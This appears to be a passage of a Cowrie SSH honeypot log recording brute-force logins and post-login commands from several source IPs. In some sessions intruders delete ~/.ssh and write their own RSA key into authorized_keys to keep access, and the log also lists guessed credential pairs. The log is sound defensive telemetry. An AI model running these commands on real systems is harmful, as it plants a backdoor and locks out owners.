{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:04:11.741791Z","src_ip":"212.227.235.229","session":"99053c8dd3f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:04:11.913522Z","src_ip":"212.227.235.229","session":"99053c8dd3f1"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password123","message":"login attempt [debian/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:04:12.726084Z","src_ip":"212.227.235.229","session":"99053c8dd3f1"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:13.899857Z","src_ip":"212.227.235.229","session":"99053c8dd3f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45776,"dst_ip":"1.2.3.4","dst_port":22,"session":"b062caca59c3","protocol":"ssh","message":"New connection: 212.227.235.229:45776 (1.2.3.4:22) [session: b062caca59c3]","sensor":"my-vps","timestamp":"2025-09-09T06:04:13.921609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:04:13.923083Z","src_ip":"212.227.235.229","session":"b062caca59c3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:04:14.102766Z","src_ip":"212.227.235.229","session":"b062caca59c3"}
{"eventid":"cowrie.login.failed","username":"web","password":"123456789","message":"login attempt [web/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T06:04:14.836644Z","src_ip":"212.227.235.229","session":"b062caca59c3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:16.025728Z","src_ip":"212.227.235.229","session":"b062caca59c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46978,"dst_ip":"1.2.3.4","dst_port":22,"session":"765fc6d93b9c","protocol":"ssh","message":"New connection: 212.227.235.229:46978 (1.2.3.4:22) [session: 765fc6d93b9c]","sensor":"my-vps","timestamp":"2025-09-09T06:04:28.694240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:04:28.695060Z","src_ip":"212.227.235.229","session":"765fc6d93b9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:04:28.781193Z","src_ip":"212.227.235.229","session":"765fc6d93b9c"}
{"eventid":"cowrie.login.failed","username":"elk","password":"elk@123","message":"login attempt [elk/elk@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:04:29.167969Z","src_ip":"212.227.235.229","session":"765fc6d93b9c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:30.257256Z","src_ip":"212.227.235.229","session":"765fc6d93b9c"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.213.18","src_port":43480,"dst_ip":"1.2.3.4","dst_port":22,"session":"072aa7f47c2b","protocol":"ssh","message":"New connection: 49.247.213.18:43480 (1.2.3.4:22) [session: 072aa7f47c2b]","sensor":"my-vps","timestamp":"2025-09-09T06:04:38.354031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:04:38.355364Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:04:38.599236Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.login.success","username":"root","password":"admin002","message":"login attempt [root/admin002] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:04:39.617973Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:04:40.127182Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:04:40.127888Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:04:40.128662Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:40.373804Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:04:40.970367Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:04:40.971079Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:04:41.216970Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:41.217904Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.213.18","src_port":44138,"dst_ip":"1.2.3.4","dst_port":22,"session":"02a96c25c4a3","protocol":"ssh","message":"New connection: 49.247.213.18:44138 (1.2.3.4:22) [session: 02a96c25c4a3]","sensor":"my-vps","timestamp":"2025-09-09T06:04:41.499833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:04:41.500770Z","src_ip":"49.247.213.18","session":"02a96c25c4a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:04:41.784324Z","src_ip":"49.247.213.18","session":"02a96c25c4a3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:04:42.961429Z","src_ip":"49.247.213.18","session":"02a96c25c4a3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:44.247850Z","src_ip":"49.247.213.18","session":"02a96c25c4a3"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.213.18","src_port":44870,"dst_ip":"1.2.3.4","dst_port":22,"session":"61d648bc2040","protocol":"ssh","message":"New connection: 49.247.213.18:44870 (1.2.3.4:22) [session: 61d648bc2040]","sensor":"my-vps","timestamp":"2025-09-09T06:04:44.530763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:04:44.531479Z","src_ip":"49.247.213.18","session":"61d648bc2040"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:04:44.815205Z","src_ip":"49.247.213.18","session":"61d648bc2040"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64494,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed9315f51612","protocol":"ssh","message":"New connection: 212.227.235.229:64494 (1.2.3.4:22) [session: ed9315f51612]","sensor":"my-vps","timestamp":"2025-09-09T06:04:45.429445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:04:45.430991Z","src_ip":"212.227.235.229","session":"ed9315f51612"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:04:45.559075Z","src_ip":"212.227.235.229","session":"ed9315f51612"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:04:45.993637Z","src_ip":"49.247.213.18","session":"61d648bc2040"}
{"eventid":"cowrie.login.failed","username":"debian","password":"Welcome1","message":"login attempt [debian/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:04:46.137843Z","src_ip":"212.227.235.229","session":"ed9315f51612"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:46.278406Z","src_ip":"49.247.213.18","session":"072aa7f47c2b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:46.279793Z","src_ip":"49.247.213.18","session":"61d648bc2040"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:04:47.271007Z","src_ip":"212.227.235.229","session":"ed9315f51612"}
{"eventid":"cowrie.session.connect","src_ip":"103.193.178.227","src_port":55516,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e69415ba547","protocol":"ssh","message":"New connection: 103.193.178.227:55516 (1.2.3.4:22) [session: 3e69415ba547]","sensor":"my-vps","timestamp":"2025-09-09T06:05:07.610178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:05:07.611415Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:05:07.874321Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.login.success","username":"root","password":"hetzner1@","message":"login attempt [root/hetzner1@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:05:08.960459Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:05:09.503926Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:05:09.504629Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:05:09.505631Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:05:09.768635Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:05:10.409672Z","src_ip":"103.193.178.227","session":"3e69415ba547"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 